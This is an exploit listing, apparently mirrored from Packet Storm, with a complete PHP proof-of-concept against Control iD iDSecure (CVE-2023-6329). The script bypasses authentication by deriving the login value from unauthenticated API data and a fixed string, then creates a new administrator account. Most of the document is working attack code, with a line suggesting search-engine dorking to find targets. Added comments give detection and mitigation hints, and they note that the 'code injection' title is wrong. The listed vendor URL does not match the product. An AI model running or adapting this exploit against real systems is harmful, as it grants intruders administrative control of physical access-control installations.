## https://sploitus.com/exploit?id=PACKETSTORM:189528
=============================================================================================================================================
| # Title : Control iD iDSecure v4.7.43.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://profil.nunukankab.go.id/org/dkisp |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
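[+] Code Description: The code exploits a vulnerability in the ControlID system to add a new administrative user without requiring an existing password.
( https://packetstorm.news/files/id/180858/ CVE-2023-6329)
Note: despite the title, the listing below performs no PHP code injection. It is an authentication bypass: the login value is computed entirely from the serial and passwordRandom that /api/login/unlockGetData returns to an unauthenticated client, combined with a fixed string. Defenders can look for that request followed by POST /api/login/ and POST /api/operator/ from the same client, and for operator accounts that nobody provisioned.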
[+] save code as poc.php.
[+] Set Target : line 114
[+] Usage : php poc.php
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the issue this page attributes to CVE-2023-6329
 * (Control iD iDSecure): it walks through three HTTP calls that end with a new
 * operator account being created without knowledge of any existing password.
 *
 * What the listing demonstrates, for reviewers and defenders:
 *  - GET /api/login/unlockGetData is called with no credentials and its response
 *    is read for "serial" and "passwordRandom".
 *  - The value sent as "passwordCustom" is derived only from those two fields
 *    and the constant string 'cid2016', so it contains no secret.
 *  - The resulting bearer token is then accepted by POST /api/operator/.
 *
 * Detection: the request sequence above from a single client, and operator
 * accounts that were not provisioned through normal administration.
 * Mitigation: apply the vendor's fix for the CVE named on this page and keep the
 * management API off untrusted networks (fixed version not stated on this page).
 */
class ControlIDExploit {
// Base URL of the iDSecure instance, stored without a trailing slash.
private $target;
// Login name of the operator account the script tries to create.
private $new_user;
// Password for that account; also sent as the confirmation field.
private $new_password;
/**
 * @param string $target       Base URL of the instance (scheme and host).
 * @param string $new_user     Operator login name to create.
 * @param string $new_password Password for the new operator.
 */
public function __construct($target, $new_user, $new_password) {
$this->target = rtrim($target, '/'); // strip any trailing "/"
$this->new_user = $new_user;
$this->new_password = $new_password;
}
/**
 * Sends one HTTP request to the target and returns the JSON-decoded body.
 *
 * The script terminates via die() on a cURL error or on HTTP 404; any other
 * status code falls through to JSON decoding.
 *
 * @param string     $method  HTTP method passed to CURLOPT_CUSTOMREQUEST.
 * @param string     $uri     Path appended to the base URL.
 * @param array|null $data    Body to send as JSON; skipped when falsy.
 * @param array      $headers Extra request header lines.
 * @return mixed Decoded JSON (objects as associative arrays); json_decode
 *               yields null when the body is not valid JSON.
 */
private function send_request($method, $uri, $data = null, $headers = []) {
$url = "{$this->target}{$uri}";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// NOTE(review): certificate and hostname verification are both switched off,
// so the peer is never authenticated and the token and credentials sent
// later can be read or altered by anyone on the network path.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // request timeout: 10 seconds
// A body is attached only for truthy $data; it is JSON-encoded and the
// matching Content-Type header is appended to the caller's headers.
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_UNESCAPED_UNICODE));
$headers[] = 'Content-Type: application/json';
}
if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
// Transport-level failure: stop the whole script.
if ($error) {
die(" Error connecting to $url: $error\n");
}
// Only 404 is treated as fatal here; other error statuses are not checked.
if ($http_code == 404) {
die(" Unexpected response (404 - Not Found): Check the link is valid $url\n");
}
// Normalise the body to UTF-8 before decoding it as JSON.
return json_decode(mb_convert_encoding($response, 'UTF-8', 'auto'), true);
}
/**
 * Runs the four steps in order: read the unlock data, derive the login value,
 * obtain a token, create the operator. Each step calls die() with the raw
 * response when the expected field is missing.
 *
 * NOTE(review): the token and the new credentials are echoed to stdout, so
 * they end up in any captured terminal output or logs.
 */
public function exploit() {
echo " Trying to get the raw data...\n";
// 1) Fetch serial and passwordRandom (request carries no credentials)
$response = $this->send_request('GET', '/api/login/unlockGetData');
if (!isset($response['passwordRandom']) || !isset($response['serial'])) {
die("❌ Failed to get raw data. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}
$password_random = $response['passwordRandom'];
$serial = $response['serial'];
echo " Retrieved passwordRandom: $password_random\n";
echo " Retrieved serial: $serial\n";
// 2) Build passwordCustom: SHA-1 of the serial, concatenated with
// passwordRandom and a fixed string, hashed with SHA-256; the first six hex
// digits are read as an integer (at most 24 bits). Every input is either
// returned by step 1 or constant, which is the root weakness shown here.
$sha1_hash = sha1($serial);
$combined_string = $sha1_hash . $password_random . 'cid2016';
$sha256_hash = hash('sha256', $combined_string);
$short_hash = substr($sha256_hash, 0, 6);
$password_custom = hexdec($short_hash);
echo " Created passwordCustom: $password_custom\n";
// 3) Log in to obtain a JWT
echo "Attempt to login...\n";
$login_data = [
'passwordCustom' => (string)$password_custom,
'passwordRandom' => $password_random
];
$response = $this->send_request('POST', '/api/login/', $login_data);
if (!isset($response['accessToken'])) {
die(" Login failed. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}
$access_token = $response['accessToken'];
echo " Obtained JWT: $access_token\n";
// 4) Add a new administrative user
// NOTE(review): presumably idType '1' marks an administrator; the meaning of
// the field is not shown in this listing.
echo " Trying to add a new user...\n";
$user_data = [
'idType' => '1',
'name' => $this->new_user,
'user' => $this->new_user,
'newPassword' => $this->new_password,
'password_confirmation' => $this->new_password
];
$headers = [
"Authorization: Bearer $access_token"
];
$response = $this->send_request('POST', '/api/operator/', $user_data, $headers);
// Success is judged by the "code" field of the JSON body, not the HTTP status.
if (!isset($response['code']) || $response['code'] != 200) {
die(" Failed to add new user. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}
echo " User added successfully: {$this->new_user}:{$this->new_password}\n";
}
}
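// Test parameters. The host is a constructed placeholder on the reserved
// .example TLD; set it to the lab iDSecure instance under test.
$target_host = 'https://idsecure.lab.example'; // placeholder, replace with the lab address
// The account created by a successful run persists on the instance until an
// operator deletes it; record these values so it can be removed afterwards.
$new_admin_user = 'adminuser';
$new_admin_password = 'securepassword';
// Run the sequence.
$exploit = new ControlIDExploit($target_host, $new_admin_user, $new_admin_password);
$exploit->exploit();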
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================